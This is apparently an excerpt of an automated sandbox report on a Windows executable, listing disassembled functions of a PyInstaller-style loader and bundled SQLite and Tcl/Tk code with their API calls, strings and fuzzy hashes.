PyErr_Occurred, xrefs: 00007FF644875B2B, 00007FF644875B4D
PyErr_Clear, xrefs: 00007FF644875AA1, 00007FF644875AC3
PyObject_GetAttrString, xrefs: 00007FF644875D53, 00007FF644875D75
Py_Finalize, xrefs: 00007FF6448758D5, 00007FF6448758F7
PyUnicode_Join, xrefs: 00007FF644875FA9, 00007FF644875FCB
PyRun_SimpleStringFlags, xrefs: 00007FF644875E0B, 00007FF644875E2D
PyImport_ImportModule, xrefs: 00007FF644875C3F, 00007FF644875C61
Py_DecRef, xrefs: 00007FF644875836, 00007FF644875858
PyUnicode_Replace, xrefs: 00007FF644875FD7, 00007FF644875FF9
PyConfig_Clear, xrefs: 00007FF64487598D, 00007FF6448759AF
Py_PreInitialize, xrefs: 00007FF64487595F, 00007FF644875981
PyObject_Str, xrefs: 00007FF644875DAF, 00007FF644875DD1
PyStatus_Exception, xrefs: 00007FF644875E39, 00007FF644875E5B
PyObject_CallFunctionObjArgs, xrefs: 00007FF644875D25, 00007FF644875D47
Py_IsInitialized, xrefs: 00007FF644875931, 00007FF644875953
PyObject_CallFunction, xrefs: 00007FF644875CF7, 00007FF644875D19
PyMem_RawFree, xrefs: 00007FF644875C9B, 00007FF644875CBD
PySys_SetObject, xrefs: 00007FF644875E95, 00007FF644875EB7
PySys_GetObject, xrefs: 00007FF644875E67, 00007FF644875E89
PyErr_NormalizeException, xrefs: 00007FF644875AFD, 00007FF644875B1F
PyImport_ExecCodeModule, xrefs: 00007FF644875C11, 00007FF644875C33
PyImport_AddModule, xrefs: 00007FF644875BE3, 00007FF644875C05
PyUnicode_DecodeFSDefault, xrefs: 00007FF644875F1F, 00007FF644875F41
Py_InitializeFromConfig, xrefs: 00007FF644875903, 00007FF644875925
PyEval_EvalCode, xrefs: 00007FF644875BB5, 00007FF644875BD7
PyObject_SetAttrString, xrefs: 00007FF644875D81, 00007FF644875DA3
PyConfig_InitIsolatedConfig, xrefs: 00007FF6448759BB, 00007FF6448759DD
PyErr_Fetch, xrefs: 00007FF644875ACF, 00007FF644875AF1
PyUnicode_Decode, xrefs: 00007FF644875EF1, 00007FF644875F13
PyUnicode_AsUTF8, xrefs: 00007FF644875EC3, 00007FF644875EE5
PyConfig_SetBytesString, xrefs: 00007FF644875A17, 00007FF644875A39
PyConfig_Read, xrefs: 00007FF6448759E9, 00007FF644875A0B
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF644875DDD, 00007FF644875DFF
Py_ExitStatusException, xrefs: 00007FF6448758AA, 00007FF6448758CC
GetProcAddress, xrefs: 00007FF644875868
PyUnicode_FromString, xrefs: 00007FF644875F7B, 00007FF644875F9D
PyUnicode_FromFormat, xrefs: 00007FF644875F4D, 00007FF644875F6F
PyErr_Restore, xrefs: 00007FF644875B87, 00007FF644875BA9
PyModule_GetDict, xrefs: 00007FF644875CC9, 00007FF644875CEB
Py_DecodeLocale, xrefs: 00007FF64487587F, 00007FF6448758A1

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: e726b319f87fac86e657827f38232fe81a3e5d189886ae629ab4691b479018e6
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: F822A2A0A0DF47EAFB45FB55ACE257522A0BF94781F841435DC1E8266CEF3EF4599200

Function 00007FF6448776C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6448776D7
GetLastError.KERNEL32 ref: 00007FF6448776E9
GetProcAddress.KERNEL32 ref: 00007FF644877725
GetLastError.KERNEL32 ref: 00007FF644877737
GetProcAddress.KERNEL32 ref: 00007FF644877750
GetLastError.KERNEL32 ref: 00007FF644877762
GetProcAddress.KERNEL32 ref: 00007FF64487777B
GetLastError.KERNEL32 ref: 00007FF64487778D
GetProcAddress.KERNEL32 ref: 00007FF6448777A9
GetLastError.KERNEL32 ref: 00007FF6448777BB
GetProcAddress.KERNEL32 ref: 00007FF6448777D7
GetLastError.KERNEL32 ref: 00007FF6448777E9
GetProcAddress.KERNEL32 ref: 00007FF644877805
GetLastError.KERNEL32 ref: 00007FF644877817
GetProcAddress.KERNEL32 ref: 00007FF644877833
GetLastError.KERNEL32 ref: 00007FF644877845
GetProcAddress.KERNEL32 ref: 00007FF644877861
GetLastError.KERNEL32 ref: 00007FF644877873

Strings

Tcl_Finalize, xrefs: 00007FF64487779F, 00007FF6448777C1
Tcl_ConditionFinalize, xrefs: 00007FF64487793D, 00007FF64487795F
Tk_Init, xrefs: 00007FF644877C79, 00007FF644877C9B
Tcl_GetString, xrefs: 00007FF644877AAD, 00007FF644877ACF
Failed to get address for %hs, xrefs: 00007FF6448776F8
Tcl_CreateThread, xrefs: 00007FF644877829, 00007FF64487784B
Tcl_Free, xrefs: 00007FF644877C4B, 00007FF644877C6D
Tcl_CreateObjCommand, xrefs: 00007FF644877A7F, 00007FF644877AA1
Tcl_EvalObjv, xrefs: 00007FF644877BEF, 00007FF644877C11
Tcl_GetVar2, xrefs: 00007FF644877A23, 00007FF644877A45
Tcl_FinalizeThread, xrefs: 00007FF6448777CD, 00007FF6448777EF
Tcl_EvalFile, xrefs: 00007FF644877B93, 00007FF644877BB5
Tcl_DoOneEvent, xrefs: 00007FF644877771, 00007FF644877793
Tcl_NewStringObj, xrefs: 00007FF644877ADB, 00007FF644877AFD
Tcl_EvalEx, xrefs: 00007FF644877BC1, 00007FF644877BE3
Tcl_SetVar2, xrefs: 00007FF644877A51, 00007FF644877A73
Tcl_SetVar2Ex, xrefs: 00007FF644877B37, 00007FF644877B59
Tcl_ConditionNotify, xrefs: 00007FF64487796B, 00007FF64487798D
Tcl_DeleteInterp, xrefs: 00007FF6448777FB, 00007FF64487781D
Tcl_MutexLock, xrefs: 00007FF6448778B3, 00007FF6448778D5
Tcl_GetObjResult, xrefs: 00007FF644877B65, 00007FF644877B87
Tcl_MutexUnlock, xrefs: 00007FF6448778E1, 00007FF644877903
Tcl_Alloc, xrefs: 00007FF644877C1D, 00007FF644877C3F
Tcl_ConditionWait, xrefs: 00007FF644877999, 00007FF6448779BB
Tcl_ThreadAlert, xrefs: 00007FF6448779F5, 00007FF644877A17
Tcl_MutexFinalize, xrefs: 00007FF64487790F, 00007FF644877931
Tcl_Init, xrefs: 00007FF6448776D0, 00007FF6448776EF
GetProcAddress, xrefs: 00007FF6448776FF
Tcl_NewByteArrayObj, xrefs: 00007FF644877B09, 00007FF644877B2B
Tcl_ThreadQueueEvent, xrefs: 00007FF6448779C7, 00007FF6448779E9
Tcl_JoinThread, xrefs: 00007FF644877885, 00007FF6448778A7
Tcl_FindExecutable, xrefs: 00007FF644877746, 00007FF644877768
Tcl_CreateInterp, xrefs: 00007FF64487771B, 00007FF64487773D
Tcl_GetCurrentThread, xrefs: 00007FF644877857, 00007FF644877879
Tk_GetNumMainWindows, xrefs: 00007FF644877CA7, 00007FF644877CC9

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: 8e171445b0fa6372433932dfcf8b905ced7772f3c74ceed9d295bd9733f6e47c
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: C102A024A0DF47E9FA15FB59A9E25B423A1BF84B85F541031DC2E862ACEF3DF159C204

Function 00007FF6448781D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6448786B7,?,?,00000000,00007FF644873CBB), ref: 00007FF64487822C

Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF64487829D
%.*s, xrefs: 00007FF64487830C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF644878240
CreateDirectory, xrefs: 00007FF64487837C
\, xrefs: 00007FF644878261
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF644878203
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6448782D9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF644878373

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
Instruction ID: 9c5d0225fd342e8fe4fe236ab1661b09eeb1239abcb5892c460514a2d240e855
Opcode Fuzzy Hash: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
Instruction Fuzzy Hash: 73517111B2CE4699FA50FB29ECE36BA62A0EF94784F445435DE0EC26DDEE3DE5048340

Function 00007FF644871600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF6448717E6
Failed to create symbolic link %s!, xrefs: 00007FF644871622
fopen, xrefs: 00007FF644871663
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6448717CA
fwrite, xrefs: 00007FF6448717D1
Failed to extract %s: failed to open target file!, xrefs: 00007FF64487165C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6448716A2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448717DF
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF644871742
malloc, xrefs: 00007FF644871749
fseek, xrefs: 00007FF6448716E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448716DA

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
Instruction ID: 635ceeb1053f39f318ee80f1db6a56b6941fd15b0c0ac8b1c02c80825c6da8db
Opcode Fuzzy Hash: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
Instruction Fuzzy Hash: 8E519D21B0CA479AEA10BB61A8E35B96390BF84B94F544535EE0C87BDEEF3DE545D300

Function 00007FFDFAF847D0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFAF1D940: 00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DAE7

Part of subcall function 00007FFDFAF1D440: 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D59A
Part of subcall function 00007FFDFAF1D440: 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D617

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF84B42

Strings

rank, xrefs: 00007FFDFAF8493C
percent_rank, xrefs: 00007FFDFAF8494E
ntile, xrefs: 00007FFDFAF84964
L, xrefs: 00007FFDFAF8492D
FILTER clause may only be used with aggregate window functions, xrefs: 00007FFDFAF848FF
RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression, xrefs: 00007FFDFAF848D4
row_number, xrefs: 00007FFDFAF84917
lead, xrefs: 00007FFDFAF8496F
lag, xrefs: 00007FFDFAF8497A
cume_dist, xrefs: 00007FFDFAF84959
dense_rank, xrefs: 00007FFDFAF84926

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
API String ID: 1405196051-2234786739
Opcode ID: 7fdef3433c8af9c56e06e0c8c5884f4f6a96688affdf847c3781df22cf6e3f60
Instruction ID: 2dabde062793fb186ce195ecb0c681d064c720cdfa4e42467c922f161ceab43f
Opcode Fuzzy Hash: 7fdef3433c8af9c56e06e0c8c5884f4f6a96688affdf847c3781df22cf6e3f60
Instruction Fuzzy Hash: F4B18B72B09B818AE728CF25D460AAE37B1FB49799F008275EA6C0B7DDDB38D155C704

Function 00007FFDFAF4D710 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

sqlite3_extension_init, xrefs: 00007FFDFAF4D79A
no entry point [%s] in shared library [%s], xrefs: 00007FFDFAF4DBAC
_init, xrefs: 00007FFDFAF4DA0E
not authorized, xrefs: 00007FFDFAF4D783
%s.%s, xrefs: 00007FFDFAF4D7DC
unable to open shared library [%.*s], xrefs: 00007FFDFAF4DD1F
error during initialization: %s, xrefs: 00007FFDFAF4DAD6
lib, xrefs: 00007FFDFAF4D961
sqlite3_, xrefs: 00007FFDFAF4D913

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 3c08afb9f4cf23902f2133180092d1d9b2eb9f4a5745907601206ded7f1cff2a
Instruction ID: 6f3ebc17328e4a0c494fc99d10bbcf5b80e55318e57d06cfa3aea7e3a80bb0ea
Opcode Fuzzy Hash: 3c08afb9f4cf23902f2133180092d1d9b2eb9f4a5745907601206ded7f1cff2a
Instruction Fuzzy Hash: 01028521B09A8385EB299B11E464BB97360FF46B90F484275DE6E4A7E9DF3CE544D300

Function 00007FFDFAF0B0E0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAF0B1E3
00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAF0B2C4

Strings

'%.*q', xrefs: 00007FFDFAF0B435
zeroblob(%d), xrefs: 00007FFDFAF0B480
%02x, xrefs: 00007FFDFAF0B4E4
-- , xrefs: 00007FFDFAF0B173, 00007FFDFAF0B192
NULL, xrefs: 00007FFDFAF0B34D
%lld, xrefs: 00007FFDFAF0B381
%!.15g, xrefs: 00007FFDFAF0B39E
?, xrefs: 00007FFDFAF0B2D8

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 1405196051-875588658
Opcode ID: cc69c06e4579cc9a63790891c0cccc49fbb47746cba14d151e36a2bdd79a4d51
Instruction ID: ef79afc256c93c9ba6dbe162cb3e57558404d5fc09c7bb731a2dab6b5b38a7f0
Opcode Fuzzy Hash: cc69c06e4579cc9a63790891c0cccc49fbb47746cba14d151e36a2bdd79a4d51
Instruction Fuzzy Hash: 8DE1B662F0856289FB25CF64D460BBC27A0AF04798F888275EE6F5B6DDDE3CA545C340

Function 00007FFDFAF27830 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF27BA2

Strings

cannot add a STORED column, xrefs: 00007FFDFAF27B42
Cannot add a UNIQUE column, xrefs: 00007FFDFAF2796C
Cannot add a column with non-constant default, xrefs: 00007FFDFAF27A39
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFAF279DF
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFAF279BD
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFAF27BE4
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFAF279C7, 00007FFDFAF27A43, 00007FFDFAF27B51
Cannot add a PRIMARY KEY column, xrefs: 00007FFDFAF27951
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFAF27D2C

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd

Similarity

API ID: 00007D2010E148
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 1405196051-200680935
Opcode ID: de498d8ebdc1d8b11aa5bcc87f253d03924d12926c0a2cf90f6d28e521af2e8d
Instruction ID: 4313b75c50a3f900d7f7d77d7eea2ea634697279e5685b60739e1f8781a23054
Opcode Fuzzy Hash: de498d8ebdc1d8b11aa5bcc87f253d03924d12926c0a2cf90f6d28e521af2e8d
Instruction Fuzzy Hash: C5E18F21B09B8285EB298B159564B7967A1FF42BE4F484271EEAD0B7DDDF3CE441C700

Function 00007FF644872180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6448721AB
SelectObject.GDI32 ref: 00007FF6448721F2
DrawTextW.USER32 ref: 00007FF644872215
SelectObject.GDI32 ref: 00007FF64487222B
ReleaseDC.USER32 ref: 00007FF64487223B
MoveWindow.USER32 ref: 00007FF64487228B
MoveWindow.USER32 ref: 00007FF6448722CB
MoveWindow.USER32 ref: 00007FF64487231E
MoveWindow.USER32 ref: 00007FF644872366

Strings

P%, xrefs: 00007FF6448721FF

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 342efc223edf27d6efe885fa86135ee1c51794963c66c520f10f4686fe324ec9
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 8351D926618BA186D634BF26E4581BAB7A1F798B61F004135EFDE83798DF3CD045DB10

Function 00007FF6448780C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6448780FF
GetWindowLongPtrW.USER32 ref: 00007FF64487817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF644878192
GetLastError.KERNEL32 ref: 00007FF64487819C
SetWindowLongPtrW.USER32 ref: 00007FF6448781B3

Strings

Needs to remove its temporary files., xrefs: 00007FF644878185

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
